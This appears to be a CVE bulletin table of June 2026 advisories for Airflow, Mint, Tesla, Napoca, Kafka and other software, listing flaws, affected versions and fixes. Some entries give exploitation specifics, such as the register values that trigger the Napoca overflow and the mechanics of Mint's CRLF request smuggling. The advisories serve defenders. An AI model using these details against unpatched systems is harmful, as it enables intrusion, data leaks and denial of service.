| Apache Software Foundation--Apache Airflow | Exploitation requires the attacker to already be an authenticated Airflow worker holding a valid Log-server JWT issued for at least one Dag. Apache Airflow's Log server authorized JWT tokens against Dag IDs by applying Python's `str.lstrip()` to the requested path segment when verifying the JWT's `sub` claim. `str.lstrip()` strips any of a *set* of characters from the left (not a prefix), so a JWT issued for a Dag named e.g. `dag_a` would authorize log access to any other Dag whose name began with any subset of the characters `{d, a, g, _}` (e.g. `dag_attacker`, `aaaa_target`, `_dag_secret`). Such an authenticated worker could enumerate and read worker logs of other Dags whose names happened to share that character-class prefix, leaking task output and error traces beyond the documented per-Dag isolation boundary. Affects deployments relying on per-Dag log-access scoping (multi-team, shared-executor, shared-worker topologies). Users are advised to upgrade to `apache-airflow` 3.2.2 or later. | 2026-06-01 | not yet calculated | CVE-2026-45426 | https://github.com/apache/airflow/pull/66749 https://lists.apache.org/thread/hz1q7vg65vq2h4fobv5ww8tp257fbqj9 |
| Apache Software Foundation--Apache Airflow | The Event Log detail endpoint `GET /api/v2/eventLogs/{event_log_id}` in Apache Airflow fetched audit-log rows directly by numeric ID after only the generic Audit Log permission check, while the collection endpoint `GET /api/v2/eventLogs` applied per-Dag scoping. An authenticated UI/API user with audit-log read permission for one Dag could retrieve audit-log entries for any other Dag by guessing or enumerating the numeric event log ID. Affects deployments that rely on per-Dag audit-log scoping. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. | 2026-06-01 | not yet calculated | CVE-2026-46764 | https://github.com/apache/airflow/pull/67112 https://lists.apache.org/thread/ctrbj7q3m86g4qxmo9ponojgmzrcoqpv |
| Apache Software Foundation--Apache Airflow | A bug in Apache Airflow's auth manager logout handling left previously-issued JWT tokens valid after the user clicked logout in the UI: the logout flow for `FabAuthManager` and `KeycloakAuthManager` did not actually reach the underlying `revoke_token()` call, so the JWT remained accepted by the API server until its natural expiry. An attacker holding a previously-issued JWT for a logged-out user could continue to make authenticated API calls as that user. Affects deployments configured with `FabAuthManager` or `KeycloakAuthManager` (the bug does not affect SimpleAuthManager). This is a residual gap in the fix for CVE-2025-57735, which addressed cookie-side invalidation in PR #57992 / PR #61339 but did not cover the provider-side `revoke_token()` reachability in the FAB / Keycloak code paths. Users who already upgraded for CVE-2025-57735 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the FAB / Keycloak logout paths. | 2026-06-01 | not yet calculated | CVE-2026-48726 | https://github.com/apache/airflow/pull/67289 https://www.cve.org/CVERecord?id=CVE-2025-57735 https://lists.apache.org/thread/630jg4z6cjkv4m2yv2ljgmf1zhdj1vqx |
| Apache Software Foundation--Apache Airflow | Apache Airflow's EmailOperator and the underlying `airflow.utils.email` helpers established SMTP STARTTLS connections without verifying the remote certificate when the deployment used `[email] smtp_starttls=True` without `[email] smtp_ssl`. An attacker positioned between the worker and the configured SMTP server (network MITM - typical hostile-network attack-surface for environments where the SMTP relay sits outside the worker's trust boundary) could present a self-signed certificate, have the worker complete the STARTTLS handshake silently, and capture the SMTP AUTH credentials and message contents the worker forwarded. This CVE covers the **core apache-airflow side** of the same root cause already covered for the SMTP provider by `CVE-2026-41016` (published 2026-04-27, covering `apache-airflow-providers-smtp`). Users who already applied the SMTP-provider fix from CVE-2026-41016 should additionally upgrade `apache-airflow` to 3.2.2 or later to cover the core-side path through `airflow.utils.email`. Affects deployments configured with `smtp_starttls=True` and `smtp_ssl=False` where the SMTP relay is reachable across a less-trusted network segment than the worker. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. | 2026-06-01 | not yet calculated | CVE-2026-49267 | https://github.com/apache/airflow/pull/65346 https://lists.apache.org/thread/6v2ds757000msmjmovnnqryqzks83ps0 |
| Apache Software Foundation--Apache Airflow | A bug in Apache Airflow's KubernetesExecutor caused JWT tokens used by worker pods to authenticate against the Execution API to be passed to the worker container as command-line arguments visible in the pod spec. An authenticated UI/API user with Kubernetes read-only access to the cluster (e.g. `pods/get` in the Airflow namespace) could harvest the JWT from `kubectl describe pod` output and then call state-mutating Execution API endpoints - triggering Dag runs, clearing runs, reading or writing Variables / Connections / XComs - as if they were a running task. Affects deployments using the `KubernetesExecutor`. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. This is the airflow-core half of the same vulnerability addressed by [CVE-2026-27173](https://www.cve.org/CVERecord?id=CVE-2026-27173), which shipped the apache-airflow-providers-cncf-kubernetes side of the fix. Deployments that already upgraded `apache-airflow-providers-cncf-kubernetes` to 10.17.0 or later per the CVE-2026-27173 advisory should additionally upgrade `apache-airflow` to 3.2.2 or later to close the core-side surface - the two fixes are complementary, not duplicates. | 2026-06-01 | not yet calculated | CVE-2026-49298 | https://github.com/apache/airflow/pull/60108 https://lists.apache.org/thread/wo09vrks8189dzsot39rvrx3vnx102tt |
| Apache Software Foundation--Apache Calcite | Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Apache Calcite. This issue affects Apache Calcite: from 1.5.0 before 1.42. Users are recommended to upgrade to version 1.42, which fixes the issue. | 2026-06-02 | not yet calculated | CVE-2026-46718 | https://lists.apache.org/thread/9s37svo343w5ck1ovh478lkzcqk4949v |
| Apache Software Foundation--Apache Directory LDAP API | It was identified that the LDAP client implementation in version 2.1.7 does not verify if the server certificate matches the intended LDAP hostname. While the underlying code validates the certificate chain against a trusted authority, the absence of endpoint identification allows a valid certificate issued for an entirely unrelated host to be improperly accepted. This oversight leaves the connection highly vulnerable to server impersonation and complete connection compromise. The root cause of this vulnerability lies in the incomplete TLS server identity verification within the LDAP client implementation. The attacker requires MITM capability on the network to exploit this vulnerability. This attacker must be able to present a certificate trusted by the client's configured trust store. The hostname verification has been enforced in the new version of the LDAP API | 2026-06-01 | not yet calculated | CVE-2026-35563 | https://lists.apache.org/thread/5rc2nzqxp1m9wknyf93r8dnp46fhc1nn |
| Apache Software Foundation--Apache Fesod (Incubating) | Server-Side Request Forgery (SSRF) in the UrlImageConverter component of Apache Fesod (Incubating) fesod-sheet before 2.0.2-incubating allows attackers to cause outbound network requests to internal or otherwise restricted resources via a user-supplied image URL. Users are recommended to upgrade to version 2.0.2-incubating, which fixes this issue. | 2026-06-01 | not yet calculated | CVE-2026-49328 | https://github.com/apache/fesod/pull/917 https://github.com/apache/fesod/releases/tag/2.0.2-incubating https://fesod.apache.org/docs/download https://lists.apache.org/thread/c1pb5b66h02p9tlrnfbwcgcz85v16fkj |
| Apache Software Foundation--Apache Fluss (incubating) | Apache Fluss versions prior to 0.9.1 configure the Netty LengthFieldBasedFrameDecoder with Integer.MAX_VALUE as the maximum frame length, allowing unauthenticated remote attackers to exhaust JVM heap memory on TabletServer and CoordinatorServer by sending specially crafted frame headers, resulting in denial of service. This issue affects Apache Fluss (incubating): 0.8.0 and 0.9.0. Users are recommended to upgrade to version 0.9.1, which fixes the issue. | 2026-06-01 | not yet calculated | CVE-2026-49361 | https://lists.apache.org/thread/dccw6tj0njwtmvbftq13mw7fdhsok373 |
| Apache Software Foundation--Apache Fory | Deserialization of Untrusted Data in the Java replace-resolve path in Apache Fory fory-core Java SDK before 1.1.0 on Java/JVM platforms allows a remote attacker to bypass class registration, TypeChecker, and DisallowedList checks and invoke classpath-present readResolve/readExternal hooks via crafted Fory serialized data. Users are recommended to upgrade to version 1.1.0 or later, which fixes this issue. | 2026-06-04 | not yet calculated | CVE-2026-50076 | https://fory.apache.org/security |
| Apache Software Foundation--Apache Kafka | An improper authorization vulnerability has been identified in Apache Kafka. The implementation of the CONSUMER_GROUP_DESCRIBE (69) API validates the DESCRIBE operation on the GROUP resource instead of the READ operation that documented in the official kafka documentation and the KIP-848. This discrepancy can result in misconfigured Access Control Lists (ACLs) and unintended security postures, like granting READ permission to users who should not be able to join/sync groups, or allowing users without READ permission (but with DESCRIBE permission) to access sensitive group metadata. The correct permission for CONSUMER_GROUP_DESCRIBE API is DESCRIBE GROUP so the current implementation is correct. However, the kafka documentation as well as the KIP-848 will be updated to reflect the correct permission. We advise the Kafka users to review existing group ACLs to ensure the principle of least privilege. | 2026-06-02 | not yet calculated | CVE-2026-41115 | https://kafka.apache.org/cve-list |
| Arista Networks--EOS | In Arista's EOS when in 802.1X mode, multi-auth unauthenticated hosts might be allowed access to a switch port if there exists an EAPOL capable device in the fallback VLAN. | 2026-06-04 | not yet calculated | CVE-2024-6858 | https://www.arista.com/en/support/advisories-notices/security-advisory/19917-security-advisory-0103 |
| Arket--Globe Document Intelligence | Cross Site Scripting (XSS) vulnerability in the "Task in Progress / Recent" page in Arket Globe Document Intelligence 5.0.0.559 due to improper sanitization of user input in text fields when creating a new document. Specifically, when an authenticated attacker submits data containing JavaScript code within these fields, the application fails to properly sanitize or escape the content. As a result, the injected script is executed when the page is rendered, allowing the attacker to execute arbitrary JavaScript in the context of other users' browsers who view the affected page. | 2026-06-04 | not yet calculated | CVE-2025-65640 | https://www.arket.it/ https://github.com/vincenzo-emanuele/CVE-2025-65640 |
| bacnet_stack--bacnet_stack 1.3.1 | bacnet_stack 1.3.1 contains an Out-of-bounds Read in bacnet_tag_number_decode which allows attackers to cause a denial of service. | 2026-06-04 | not yet calculated | CVE-2026-38570 | https://github.com/bacnet-stack/bacnet-stack https://github.com/bacnet-stack/bacnet-stack/issues/1270 |
| BINARY--DataDog::DogStatsd | DataDog::DogStatsd versions through 0.07 for Perl allow metric injections from event tags. DataDog::DogStatsd does not properly sanitise input, allowing metric injections of data from untrusted sources. The format_event method (used by the event method) does not validate the content of the tags, which may contain commas (allowing tags to be injected) or newlines, pipes and colons that allow metric injections. (There is an ineffective s/|//g to remove pipes, but because the pipe is not escaped, it is interpreted as a regular expression metacharacter and has no effect.) | 2026-06-05 | not yet calculated | CVE-2026-11362 | https://www.cve.org/CVERecord?id=CVE-2026-46741 https://www.cve.org/CVERecord?id=CVE-2026-46719 https://www.cve.org/CVERecord?id=CVE-2026-46720 |
| BINARY--DataDog::DogStatsd | DataDog::DogStatsd versions through 0.07 for Perl allow metric injections. DataDog::DogStatsd does not properly sanitise input, allowing metric injections of data from untrusted sources. The send_stats method does not remove newlines from metric names ($stat variable), allowing attackers to change the metric name prefix. The send_stats method does not validate the content of the value ($delta variable), allowing attackers to inject metrics, especially from methods that do not restrict the data type for the value, such as set, gauge, count and histogram. The send_stats method does not validate the content of the tags, which may contain newlines, pipes and colons that allow metric injections. Note that the SYNOPSIS shows an example of passing a website form "loginName" parameter as a tag, which is unsafe. | 2026-06-05 | not yet calculated | CVE-2026-9270 | https://www.cve.org/CVERecord?id=CVE-2026-46741 https://www.cve.org/CVERecord?id=CVE-2026-46719 https://www.cve.org/CVERecord?id=CVE-2026-46720 |
| Bitdefender--Napoca bare-metal hypervisor | Bitdefender Napoca bare-metal hypervisor contains an out-of-bounds write vulnerability in the BIOS INT 0x15 / E820 memory map handler, implemented in napoca/guests/bios_handlers.c. The handler computes a destination offset into the guest RealModeMemory buffer from guest-controlled ES and EDI register values without validating that the resulting address remains within the 1MB RealModeMemory allocation. A malicious guest operating in real mode can trigger the issue by invoking INT 0x15 with AX=0xE820, EDX=0x534D4150, ECX greater than or equal to 20, EBX=0, ES=0xFFFF, and EDI=0xFFFF. This can cause a write of up to 20 bytes past the end of the RealModeMemory buffer into the hypervisor heap. The product is end-of-life and unsupported when assigned. | 2026-06-02 | not yet calculated | CVE-2026-10046 | https://www.bitdefender.com/consumer/support/security-advisories/out-of-bounds-write-in-napoca-bios-int-0x15-e820-memory-map-handler-va-13905 |
| Bitdefender--Napoca bare-metal hypervisor | The Bitdefender Napoca bare-metal hypervisor contains an out-of-bounds write vulnerability in the real-mode hook handler, implemented in napoca/kernel/handler.c. The handler uses a guest-controlled SS:SP-derived offset as an index into the 1MB RealModeMemory buffer without bounds validation. With SS=0xFFFF and ESP=0xFFFF, the computed offset can reach 0x10FFEF, exceeding the RealModeMemory buffer by 65,519 bytes. The IRET frame push can therefore write past the end of the buffer into the hypervisor heap. The product is end-of-life and unsupported when assigned. | 2026-06-02 | not yet calculated | CVE-2026-10047 | https://www.bitdefender.com/support/security-advisories/out-of-bounds-write-in-napoca-real-mode-hook-handler-via-guest-controlled-sssp-va-13905 |
| CloakHQ--CloakBrowser | CloakBrowser is a tool to bypass bot detection tests. Prior to version 0.3.28, the cloakserve CDP multiplexer uses the user-supplied fingerprint query parameter directly as a filesystem path component when creating Chrome profile directories. An unauthenticated attacker who can reach the cloakserve port can supply a crafted fingerprint value containing path traversal sequences to resolve user_data_dir outside the configured data_dir. When Chrome fails to start or the process is cleaned up, shutil.rmtree() deletes the traversed path, resulting in arbitrary directory deletion. Additionally, cloakserve bound to 0.0.0.0 by default, making it network-exposed. This issue has been patched in version 0.3.28. | 2026-06-01 | not yet calculated | CVE-2026-45727 | https://github.com/CloakHQ/CloakBrowser/security/advisories/GHSA-mf33-gv72-w2h5 |
| CloudFoundry Foundation--smb-volume-release | Input validation bypass in SMB volume mount handling in CloudFoundry Foundation diego-release allows low-privileged CF space developer to inject arbitrary kernel CIFS mount options via bypassing the mount-option allowlist, enabling privilege escalation and security control bypass on multi-tenant Diego cells. Affected versions: smb-volume-release: All versions prior to v3.60.0 CF Deployment: All versions prior to v56.0.0 | 2026-06-01 | not yet calculated | CVE-2026-41013 | https://www.cloudfoundry.org/blog/cve-2026-41013-tenant-controlled-comma-smuggles-arbitrary-cifs-mount-options/ |
| Collibra--Collibra Platform (on-prem) | Improper Authentication in REST API in Collibra Agent, allows a remote unauthenticated attacker to access privileged functionality via exposed '/rest/* endpoints. | 2026-06-02 | not yet calculated | CVE-2026-10622 | https://www.collibra.com/ https://kb.cert.org/vuls/id/873170 |
| Collibra--Collibra Platform (SaaS) | Path traversal in restore handler in Collibra Agent, allows an attacker to write arbitrary files via a crafted ZIP archive. Collibra Agent fails to properly validate and canonicalize file path during ZIP extraction, this can allow an attacker to write files outside the intended extraction directory. | 2026-06-02 | not yet calculated | CVE-2026-10621 | https://www.collibra.com/ https://kb.cert.org/vuls/id/873170 |
| Concrete CMS--Concrete CMS | Concrete CMS below 9.5.2 is vulnerable to PHP Object Injection via unserialize() calls in the Workflow, Form block, and File/Set components that lack the allowed_classes restriction. An unauthenticated attacker may trigger arbitrary PHP object instantiation if a malicious serialized payload has been placed in the database. Thanks XananasX7 and Sanjorn Keeratirungsan (dizconnect) for both independently reporting. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 8.4 with vector CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. | 2026-06-03 | not yet calculated | CVE-2026-7888 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/952-release-notes |
| Controller--Controller v12.0.5 | An issue in the cluster-admin:backup-datastore component of Controller v12.0.5 allows attackers to execute a directory traversal via a crafted request. | 2026-06-05 | not yet calculated | CVE-2026-36500 | https://docs.opendaylight.org/en/stable-titanium/release-notes/index.html https://github.com/majdlatah/ODL-Path-Traversal |
| Controller--Controller v12.0.5 | An issue in the Externalizable.readExternal() component of Controller v12.0.5 allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-06-05 | not yet calculated | CVE-2026-36501 | https://docs.opendaylight.org/en/stable-titanium/release-notes/projects/controller.html https://github.com/majdlatah/ODL-Raft-Bug/blob/main/README.md |
| COSIMO--Net::Statsd | Net::Statsd versions before 0.13 for Perl allow metric injections. The metric names are not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics. The update_stats (used for updating counters) and gauge methods do not check that values are numeric (which would block metric injection). | 2026-06-04 | not yet calculated | CVE-2026-46739 | https://github.com/cosimo/perl5-net-statsd/pull/10 https://www.cve.org/CVERecord?id=CVE-2026-46719 https://www.cve.org/CVERecord?id=CVE-2026-46720 |
| CrowCpp--Crow | CrowCpp Crow through v1.3.1 HTTP is vulnerable to response header injection via unvalidated response header values. | 2026-06-02 | not yet calculated | CVE-2026-38967 | https://github.com/CrowCpp/Crow/issues/1165 https://github.com/CrowCpp/Crow/pull/1167 |
| CRUX--Protocol::HTTP2 | Protocol::HTTP2 versions through 1.12 for Perl is vulnerable to a HTTP/2 Bomb. Protocol::HTTP2's inbound HPACK path has no header-list size limit, so a small HTTP/2 request can expand into large server memory (the "HTTP/2 bomb"). The headers_decode method materialises a full key+value copy per indexed reference with no running size check, and the stream_header_block_add method appends (since version 1.12) every CONTINUATION frame to the per-stream buffer unbounded. MAX_HEADER_LIST_SIZE (default 65536) is advertised in SETTINGS but never consulted on decode. It is absent from the decoder and from the :limits export tag. | 2026-06-06 | not yet calculated | CVE-2026-10725 | https://metacpan.org/release/CRUX/Protocol-HTTP2-1.12/source/lib/Protocol/HTTP2/HeaderCompression.pm#L133 https://metacpan.org/release/CRUX/Protocol-HTTP2-1.12/source/lib/Protocol/HTTP2/Stream.pm#L414 https://security.metacpan.org/patches/P/Protocol-HTTP2/1.12/CVE-2026-10725-r1.patch |
| damasac--thaipalliative_lte | Multiple reflected Cross-Site Scripting (XSS) vulnerabilities in damasac thaipalliative_lte through version 3.0 allow remote attackers to inject arbitrary web script or HTML via the idFormMain parameter (line 24), the id parameter (lines 25, 75), and the ptid_key parameter (lines 26, 42) in /substudy/ezform.php. User input is echoed into HTML attributes and JavaScript contexts without encoding. | 2026-06-05 | not yet calculated | CVE-2026-38579 | https://github.com/damasac/thaipalliative_lte/blob/57b57630fb403eba524533062ef5244e9b7c4380/substudy/ezform.php#L14 https://github.com/theemperorspath/advisories/blob/main/2026/CVE-2026-38579.md |
| danny-avila--LibreChat | LibreChat is an enhanced ChatGPT clone that supports multiple AI providers. In versions up to and including 0.8.3, a shared-agent editor can delete file records through `DELETE /api/files` that the owner has reused across multiple agents. The deletion removes the file globally - not just from the shared agent - breaking the owner's other private agents that reference the same `file_id`. The private agent retains a stale `file_id` reference that no longer resolves. A shared-agent editor can destroy files that the owner uses across multiple agents. The owner's private agents - which the attacker has no access to - break silently with stale `file_id` references. This is a cross-agent integrity violation: editing access to one agent should not affect another. Version 0.8.4 contains a patch. | 2026-06-02 | not yet calculated | CVE-2026-44654 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-f8jg-v856-mf6q |
| Devolutions--Server | Improper access control in the PAM account discovery feature in Devolutions Server 2026.1.19 and earlier allows an authenticated user without administrative privileges to delete network discovery scan configurations. | 2026-06-02 | not yet calculated | CVE-2026-9522 | https://devolutions.net/security/advisories/DEVO-2026-0014/ |
| Devolutions--Server | Improper access control in the permission validation component in Devolutions Server 2026.1.19 and earlier allows an authenticated user with entry edit privileges to modify asset information without the required permission. | 2026-06-02 | not yet calculated | CVE-2026-9590 | https://devolutions.net/security/advisories/DEVO-2026-0014/ |
| dfir-iris--iris-web | Iris is a web collaborative platform that helps incident responders share technical details during investigations. Prior to version 2.4.28, DFIR-IRIS exposes an optional GraphQL endpoint at `/graphql` that does not enforce the same authorization checks as the REST API. Any authenticated user can abuse it in three ways: unauthorized IOC read across cases (IDOR), bulk IOC disclosure via `case.iocs`. The `case(caseId: …).iocs` resolver returns IOCs linked to an arbitrary case without verifying the caller has access to that case, and unauthorized case creation. All three are reachable by any authenticated user, regardless of role or case ACL. This is fixed in v2.4.28. The GraphQL blueprint, resolvers, and dependencies (`graphene`, `graphene-sqlalchemy`, `graphql-server[flask]`) were removed entirely, since the feature was not in use. As a workaround, block `/graphql` at the reverse proxy (recommended) or comment out the `graphql_blueprint` import and `register_blueprint` call in `source/app/views.py` and restart. | 2026-06-04 | not yet calculated | CVE-2026-41522 | https://github.com/dfir-iris/iris-web/security/advisories/GHSA-3mxh-x92q-9r25 |
| Disig--Web Signer | A critical Remote Code Execution (RCE) vulnerability exists in Disig Web Signer versions 2.0.3 through 2.5.3. | 2026-06-01 | not yet calculated | CVE-2026-8931 | https://www.disig.sk/en/news/important-update-of-the-web-signer-application/ https://www.disig.sk/sk/aktuality/dolezita-aktualizacia-aplikacie-web-signer/ https://download.disigcdn.sk/cdn/products/websigner2/changelog.en.txt https://download.disigcdn.sk/cdn/products/websigner2/changelog.sk.txt https://qesportal.sk/Portal/en/Info/News#websigner255 https://qesportal.sk/Portal/sk/Info/News#websigner255 |
| Docker--Docker Desktop | Fixed a VM panic caused by unbounded recursion in the grpcfuse kernel module when a container created deeply nested directories on a bind-mounted host folder and triggered a dentry invalidation event. This issue has been fixed in Docker Desktop 4.76.0. | 2026-06-02 | not yet calculated | CVE-2026-8936 | https://docs.docker.com/desktop/release-notes/#4760 |
| Dovestones Softwares--ADPhonebook | Dovestones Softwares ADPhonebook before v4.0.1.1 is vulnerable to a Cross Site Scripting vulnerability. The /Admin/Save API allows an authenticated admin user to store malicious JavaScript payloads in multiple configuration sections without proper input validation or output encoding. | 2026-06-03 | not yet calculated | CVE-2026-36460 | https://dovestones.com/download/ https://gist.github.com/pentestrox/16d92f8f8114ad3b34805c449f573cef |
| elixir-mint--mint | Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability in elixir-mint Mint allows HTTP Request Splitting and HTTP Request Smuggling. In lib/mint/http1/request.ex, the encode_request_line/2 function splices the caller-supplied method and target arguments directly into the HTTP/1 request line without any character validation: [method, ?\s, target, " HTTP/1.1\r\n"]. An application that forwards attacker-controlled input as the HTTP method or target to Mint.HTTP.request/5 is therefore exposed to request-line CRLF injection: the attacker can terminate the request line early, inject arbitrary headers, and smuggle an entirely separate pipelined HTTP request onto the same TCP connection. Mint 1.7.0 introduced validate_request_target/2, which rejects CRLF and other control characters in the target by default and closes the path/query vector unless the caller opts out via skip_target_validation: true. The method field remains unvalidated, so the method-based injection is exploitable under the default Mint configuration on all versions. This issue affects mint: from 0.1.0 before 1.9.0. | 2026-06-02 | not yet calculated | CVE-2026-48861 | https://github.com/elixir-mint/mint/security/advisories/GHSA-2pg6-44cx-c49v https://cna.erlef.org/cves/CVE-2026-48861.html https://osv.dev/vulnerability/EEF-CVE-2026-48861 https://github.com/elixir-mint/mint/commit/fad091454cbb7449b19edb8e1fee12ca7cf28c3a |
| elixir-mint--mint | Allocation of Resources Without Limits or Throttling vulnerability in elixir-mint Mint allows attacker-controlled HTTP/2 servers to exhaust memory in a Mint client via PUSH_PROMISE flooding. In lib/mint/http2.ex, Mint.HTTP2.decode_push_promise_headers_and_add_response/5 inserts a :reserved_remote entry into conn.streams for every promised stream ID. The neighbouring Mint.HTTP2.assert_valid_promised_stream_id/2 only verifies that the promised ID is even and not already present; client_settings.max_concurrent_streams is not consulted at promise time. The concurrency cap is only checked when the response HEADERS for the promised stream arrive, so a server that emits PUSH_PROMISE frames and withholds the matching HEADERS never trips that check. HTTP/2 server push is accepted by default (client_settings.enable_push defaults to true). A single long-lived HTTP/2 connection to a hostile server lets that server pin one conn.streams entry per PUSH_PROMISE frame it sends, with no upper bound, until the client process runs out of memory. This issue affects mint: from 0.2.0 before 1.9.0. | 2026-06-02 | not yet calculated | CVE-2026-48862 | https://github.com/elixir-mint/mint/security/advisories/GHSA-g586-ccqf-7x4r https://cna.erlef.org/cves/CVE-2026-48862.html https://osv.dev/vulnerability/EEF-CVE-2026-48862 https://github.com/elixir-mint/mint/commit/70b97b6a5209fb288b0e04d8e657dda26c59de67 |
| elixir-mint--mint | Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in elixir-mint Mint allows attacker-controlled HTTP/1 servers to desynchronise response framing on shared connections. Mint's HTTP/1 Content-Length parser, Mint.HTTP1.Parse.content_length_header/1 in lib/mint/http1/parse.ex, parses the header value with Integer.parse/1, which accepts an optional + or - sign prefix. The length >= 0 guard rejects negatives, but inputs such as +0 or +123 are returned as valid lengths. RFC 7230 specifies Content-Length = 1*DIGIT, with no sign character permitted. A fronting proxy or load balancer that strictly enforces the grammar will reject or reframe a header like Content-Length: +0, while Mint silently treats it as zero. When Mint reuses the socket (keep-alive, pipelining, or any pooled connection shared across requesters), the parser disagreement is a response-smuggling primitive: the proxy delimits the body one way, Mint another, and bytes from one response get attributed to the next. Where the same Mint connection is shared across trust boundaries, an attacker-controlled upstream can leak bytes into a different consumer's response stream. This issue affects mint: from 0.1.0 before 1.9.0. | 2026-06-02 | not yet calculated | CVE-2026-49753 | https://github.com/elixir-mint/mint/security/advisories/GHSA-mjqx-c6f6-7rc2 https://cna.erlef.org/cves/CVE-2026-49753.html https://osv.dev/vulnerability/EEF-CVE-2026-49753 https://github.com/elixir-mint/mint/commit/47e48027480228e4e32a0b4df39db497b4804921 |
| elixir-mint--mint | Allocation of Resources Without Limits or Throttling vulnerability in elixir-mint Mint allows attacker-controlled HTTP/2 servers to exhaust memory in a Mint client (HTTP/2 CONTINUATION flood). When Mint's HTTP/2 receive path observes a HEADERS frame without the END_HEADERS flag, the unparsed header-block fragment is parked in conn.headers_being_processed, and every subsequent CONTINUATION frame on that stream is appended to the accumulator. Nothing in the receive path caps the accumulator: there is no per-stream size limit, no CONTINUATION frame-count limit, and max_header_list_size is only enforced on outgoing requests, never on inbound header blocks (its default is :infinity). A malicious or compromised HTTP/2 server can stream an endless sequence of CONTINUATION frames (each up to the peer-advertised SETTINGS_MAX_FRAME_SIZE) and drive the client's iolist to arbitrary size, causing memory exhaustion and BEAM process death. A single connection to an attacker-controlled HTTP/2 endpoint is sufficient. This issue affects mint: from 0.1.0 before 1.9.0. | 2026-06-02 | not yet calculated | CVE-2026-49754 | https://github.com/elixir-mint/mint/security/advisories/GHSA-2p26-p43x-fhp8 https://cna.erlef.org/cves/CVE-2026-49754.html https://osv.dev/vulnerability/EEF-CVE-2026-49754 https://github.com/elixir-mint/mint/commit/b662d127d3028b5426c88d4c9cc7fe430491a10b |
| elixir-tesla--tesla | Improper Handling of Highly Compressed Data (Data Amplification) vulnerability in elixir-tesla tesla allows a denial of service via decompression bomb in HTTP response bodies. When Tesla.Middleware.DecompressResponse or Tesla.Middleware.Compression is included in a Tesla middleware pipeline, HTTP response bodies are decompressed eagerly with no size limit. The decompress_body/2 function in lib/tesla/middleware/compression.ex passes the entire response body to :zlib.gunzip/1 or :zlib.unzip/1 without any cap on the output size. Additionally, compression_algorithms/1 splits the content-encoding header on commas and decompress_body/2 recurses once per token, applying a decompression pass on each iteration. A server advertising content-encoding: gzip, gzip, gzip, gzip causes four recursive decompression passes, yielding exponential amplification: each gzip layer can expand its input roughly 1000x, so a payload of a few hundred bytes on the wire inflates to gigabytes of BEAM heap, exhausting memory and crashing or freezing the calling process. This issue affects tesla: from 0.6.0 before 1.18.3. | 2026-06-02 | not yet calculated | CVE-2026-48594 | https://github.com/elixir-tesla/tesla/security/advisories/GHSA-mc85-72gr-vm9f https://cna.erlef.org/cves/CVE-2026-48594.html https://osv.dev/vulnerability/EEF-CVE-2026-48594 https://github.com/elixir-tesla/tesla/commit/340f75b5d191dc747ef7ac6365bd002d1cd55a9d |
| elixir-tesla--tesla | Improper Handling of Case Sensitivity vulnerability in elixir-tesla tesla allows credential leakage to a third-party origin on cross-origin redirects. Tesla.Middleware.FollowRedirects strips security-sensitive headers on cross-origin redirects using a case-sensitive string comparison against a lowercase filter list (@filter_headers ["authorization", "host"]). HTTP header names are case-insensitive per RFC 7230, but Tesla preserves header keys verbatim as supplied by the caller without normalizing case. A header set as {"Authorization", "Bearer …"} (the RFC 7235 canonical casing used by virtually all HTTP libraries and documentation) does not match the lowercase filter entry and is forwarded to the redirect destination. An attacker who can control or influence a Location: response seen by the client (via their own endpoint, a redirect-open upstream, or a compromised origin) receives the bearer token or other Authorization material on the cross-origin request. This issue affects tesla: from 1.4.0 before 1.18.3. | 2026-06-02 | not yet calculated | CVE-2026-48595 | https://github.com/elixir-tesla/tesla/security/advisories/GHSA-9m9w-gxf7-rh8m https://cna.erlef.org/cves/CVE-2026-48595.html https://osv.dev/vulnerability/EEF-CVE-2026-48595 https://github.com/elixir-tesla/tesla/commit/db963dba67651b9abd1fc420a1d9679cf6efe182 |
| elixir-tesla--tesla | Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting') vulnerability in elixir-tesla tesla allows HTTP header injection via Tesla.Multipart.add_content_type_param/2. Tesla.Multipart.add_content_type_param/2 appends caller-supplied strings to the multipart content_type_params list without validating for CR (\r) or LF (\n) characters. Tesla.Multipart.headers/1 then joins these params verbatim with "; " to construct the outgoing Content-Type header value. A param containing \r\n splits the header line, allowing arbitrary headers to be injected into the outbound HTTP request. Any application that forwards untrusted input (such as a user-supplied charset or parameter string) into add_content_type_param/2 is affected. This issue affects tesla: from 0.8.0 before 1.18.3. | 2026-06-02 | not yet calculated | CVE-2026-48596 | https://github.com/elixir-tesla/tesla/security/advisories/GHSA-q7jx-v53g-848w https://cna.erlef.org/cves/CVE-2026-48596.html https://osv.dev/vulnerability/EEF-CVE-2026-48596 https://github.com/elixir-tesla/tesla/commit/23601edac5d22ba9407b427967b5bdbda201aec2 |
| elixir-tesla--tesla | Allocation of Resources Without Limits or Throttling vulnerability in elixir-tesla tesla allows denial of service via atom table exhaustion in Tesla.Adapter.Mint. Tesla.Adapter.Mint.open_conn/2 converts the URL scheme of every outgoing request to a BEAM atom via String.to_atom(uri.scheme) with no allow-list validation. BEAM atoms are never garbage-collected and the atom table is bounded (approximately 1,048,576 entries by default). An attacker who can influence the URL of a Tesla request - either via an application-level URL-forwarding feature (webhook, proxy, importer) or via a Location header returned by a server when Tesla.Middleware.FollowRedirects is in the pipeline - can mint one fresh permanent atom per request by varying the scheme string. After enough requests the atom table fills and the VM crashes, taking down the entire application. This issue affects tesla: from 1.3.0 before 1.18.3. | 2026-06-02 | not yet calculated | CVE-2026-48597 | https://github.com/elixir-tesla/tesla/security/advisories/GHSA-h74c-q9j7-mpcm https://cna.erlef.org/cves/CVE-2026-48597.html https://osv.dev/vulnerability/EEF-CVE-2026-48597 https://github.com/elixir-tesla/tesla/commit/4699c3cb3e2fd6078f99f45f11cf7466aeedbf0e |
